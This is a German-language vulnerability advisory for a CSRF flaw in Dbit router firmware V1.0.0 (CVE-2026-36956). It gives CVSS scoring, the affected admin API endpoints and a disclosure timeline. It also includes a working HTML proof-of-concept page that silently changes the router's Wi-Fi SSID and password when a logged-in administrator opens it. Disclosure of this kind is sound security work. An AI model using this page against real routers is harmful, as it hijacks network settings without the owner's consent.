
Proof-of-Concept für CVE-2026-36956, eine CSRF-Schwachstelle in der Dbit-Router-Firmware, die unbefugte Konfigurationsänderungen über gefälschte Anfragen ermöglicht.
CVE-ID: CVE-2026-36956 Datum: 2026-04-29 Entdecker: Kirubel Solomne Hersteller: Shenzhen Dibit Network Equipment Co., Ltd. Produkt: Dbit Router Firmware-Version: V1.0.0 CWE: CWE-352 - Cross-Site Request Forgery (CSRF)
Die Dbit-Router-Firmware V1.0.0 implementiert keine CSRF-Schutzmechanismen wie Anti-CSRF-Tokens oder eine strikte Origin-/Referer-Validierung auf administrativen API-Endpunkten. Ein Angreifer kann eine bösartige Webseite erstellen, die gefälschte HTTP-Anfragen an Konfigurationsendpunkte sendet. Wenn ein authentifizierter Administrator die bösartige Seite besucht, verarbeitet der Router die gefälschte Anfrage als legitime administrative Aktion.
CVSS v3.1-Score: 8.8 (Hoch)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| Metrik | Wert |
|---|
| Angriffsvektor | Netzwerk |
| Angriffskomplexität | Niedrig |
| Erforderliche Privilegien | Keine |
| Benutzerinteraktion | Erforderlich |
| Auswirkung auf Vertraulichkeit | Hoch |
| Auswirkung auf Integrität | Hoch |
| Auswirkung auf Verfügbarkeit | Hoch |
| Endpunkt | Funktion |
|---|---|
/api/setWlan | Drahtlose Netzwerkkonfiguration (SSID, Passwort) |
/api/setWan | WAN-Konfiguration |
/api/setSystem | Systemkonfiguration |
Speichern Sie Folgendes als poc.html und öffnen Sie es, während ein Administrator beim Router angemeldet ist:
<!DOCTYPE html>
<html>
<body>
<script>
fetch('http://192.168.10.1/api/setWlan', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
ssid: "Hacked_Network",
password: "attacker123"
})
});
</script>
</body>
</html>
Erwartetes Verhalten: Die Anfrage sollte aufgrund einer CSRF-Token-Abweichung abgelehnt werden. Tatsächliches Verhalten: Der Router akzeptiert und verarbeitet die gefälschte Anfrage.
| Datum | Ereignis |
|---|---|
| 2026-04-29 | Schwachstelle entdeckt |
| 2026-04-29 | An MITRE gemeldet |
| 2026-04-29 | CVE-2026-36956 zugewiesen |
| 2026-04-29 | Öffentliche Offenlegung |